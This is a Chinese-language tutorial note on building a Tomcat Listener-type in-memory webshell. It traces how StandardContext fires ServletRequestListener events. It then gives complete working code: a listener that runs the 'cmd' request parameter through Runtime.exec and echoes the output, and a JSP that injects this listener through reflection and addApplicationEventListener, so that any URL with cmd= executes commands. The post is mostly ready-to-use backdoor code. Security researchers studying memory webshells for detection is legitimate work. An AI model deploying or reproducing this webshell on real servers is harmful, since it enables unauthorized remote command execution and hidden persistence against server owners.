笔记

Listener型内存马不像Filter型那么复杂。Listener型内存马只涉及一个变量applicationEventListenersList。

tomcat有一堆listener,其中ServletRequestListener是监听http请求的,最适合做内存马。

准备环境

和Filter型内存马一样新建项目,然后写一个正常的listener。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
package org.example.demo3;

import jakarta.servlet.ServletRequestEvent;

import jakarta.servlet.ServletRequestListener;

public class Listener1 implements ServletRequestListener {

    public Listener1() {
    }

    @Override
    public void requestDestroyed(ServletRequestEvent sre) {

    }

    @Override
    public void requestInitialized(ServletRequestEvent sre) {
        System.out.println("Listener 被调用");
    }
}

Java内存马系列-04-Tomcat 之 Listener 型内存马 | Drunkbaby’s Blog这里面讲错了,@WebListener注解里的参数是注解的描述,所以@WebListener("/listenerTest") 只能把类注册为监听器。没有指定路径的作用,即使加上这个注解,listener还是对所有路径都生效。

web.xml

1
2
3
4
5
6
7
8
9
<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="https://jakarta.ee/xml/ns/jakartaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="https://jakarta.ee/xml/ns/jakartaee https://jakarta.ee/xml/ns/jakartaee/web-app_6_0.xsd"
         version="6.0">
    <listener>
        <listener-class>org.example.demo3.Listener1</listener-class>
    </listener>
</web-app>

pom.xml里加上

1
2
3
4
5
6
7
8
9
10
<dependency>
    <groupId>org.apache.tomcat</groupId>
    <artifactId>tomcat-catalina</artifactId>
    <version>10.1.40</version>
</dependency>
<dependency>
    <groupId>org.apache.tomcat</groupId>
    <artifactId>tomcat-websocket</artifactId>
    <version>10.1.40</version>
</dependency>

Listener调用过程分析

在自己写的listener里的 requestInitialized里打断点,调试运行

往上找一层,发现是从org.apache.catalina.core.StandardContext#fireRequestInitEvent过来的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
public boolean fireRequestInitEvent(ServletRequest request) {

        Object[] instances = getApplicationEventListeners();

        if ((instances != null) && (instances.length > 0)) {

            ServletRequestEvent event = new ServletRequestEvent(getServletContext(), request);

            for (Object instance : instances) {
                if (instance == null) {
                    continue;
                }
                if (!(instance instanceof ServletRequestListener)) {
                    continue;
                }
                ServletRequestListener listener = (ServletRequestListener) instance;

                try {
                    listener.requestInitialized(event);//这里过来的
                } catch (Throwable t) {
                    ExceptionUtils.handleThrowable(t);
                    getLogger().error(
                            sm.getString("standardContext.requestListener.requestInit", instance.getClass().getName()),
                            t);
                    request.setAttribute(RequestDispatcher.ERROR_EXCEPTION, t);
                    return false;
                }
            }
        }
        return true;
    }

往上找,listener变量是instance转的,instance是从instances里取的,instancesgetApplicationEventListeners()返回的,进到这个函数里看看:

1
2
3
public Object[] getApplicationEventListeners() {
    return applicationEventListenersList.toArray();
}

显然和之前的filterConfigsfilterMapsfilterDefs一样,applicationEventListenersList也是context下的一个存储信息的变量,只不过存储的是listener的信息。

搜索applicationEventListenersList,直接找到了addApplicationEventListener方法。反射拿到StandardContext之后直接调用这个方法添加一个恶意的listener就行了。

构造内存马

先写用正常的写法,写一个带webshell的listener。此时会遇到一个问题,在listener里访问不到response,也就没办法回显命令执行的结果。

sre.getServletRequest()实际返回的是一个RequestFacade,里面是有一个Request类型的request的,而Request类的getResponse()可以获取到response

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
package org.example.demo3;

import jakarta.servlet.ServletRequestEvent;

import jakarta.servlet.ServletRequestListener;
import org.apache.catalina.connector.Request;
import org.apache.catalina.connector.RequestFacade;
import org.apache.catalina.connector.Response;

import java.io.InputStream;
import java.lang.reflect.Field;
import java.util.Scanner;

public class Listener1 implements ServletRequestListener {

    public Listener1() {
    }

    @Override
    public void requestDestroyed(ServletRequestEvent sre) {

    }

    @Override
    public void requestInitialized(ServletRequestEvent sre) {
        try {
            RequestFacade reqfacade = (RequestFacade) sre.getServletRequest();
            Field reqfield = RequestFacade.class.getDeclaredField("request");
            reqfield.setAccessible(true);
            Request request = (Request) reqfield.get(reqfacade);
            Response response = (Response) request.getResponse();
            if (request.getParameter("cmd") != null) {
                InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
                Scanner s = new Scanner(in).useDelimiter("\\a");
                String output = s.hasNext() ? s.next() : "";
                response.getWriter().write(output);
                response.getWriter().flush();
            }
        } catch (Exception e) {
        }
    }
}

把这个恶意listener用addApplicationEventListener添加到StandardContext里就行了。StandardContext还是用反射一步一步获取:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.core.ApplicationContext" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="org.apache.catalina.connector.Request" %>
<%@ page import="org.apache.catalina.connector.Response" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="org.apache.catalina.connector.RequestFacade" %>
<%@ page import="java.util.Scanner" %>
<%
    ServletContext context1=pageContext.getServletContext();
    System.out.println(context1.getClass().getName());

    Field field1=context1.getClass().getDeclaredField("context");
    field1.setAccessible(true);
    ApplicationContext context2= (ApplicationContext) field1.get(context1);
    System.out.println(context2.getClass().getName());

    Field field2=context2.getClass().getDeclaredField("context");
    field2.setAccessible(true);
    StandardContext context3= (StandardContext) field2.get(context2);
    System.out.println(context3.getClass().getName());

    class Listener1 implements ServletRequestListener {

        public Listener1() {
        }

        @Override
        public void requestDestroyed(ServletRequestEvent sre) {

        }

        @Override
        public void requestInitialized(ServletRequestEvent sre) {
            try {
                RequestFacade reqfacade = (RequestFacade) sre.getServletRequest();
                Field reqfield = RequestFacade.class.getDeclaredField("request");
                reqfield.setAccessible(true);
                Request request = (Request) reqfield.get(reqfacade);
                Response response = (Response) request.getResponse();
                if (request.getParameter("cmd") != null) {
                    InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
                    Scanner s = new Scanner(in).useDelimiter("\\a");
                    String output = s.hasNext() ? s.next() : "";
                    response.getWriter().write(output);
                    response.getWriter().flush();
                }
            } catch (Exception e) {
            }
        }
    }

    context3.addApplicationEventListener(new Listener1());
%>

访问这个jsp之后,访问任意路径带上cmd参数即可执行命令。

image-20250526182556964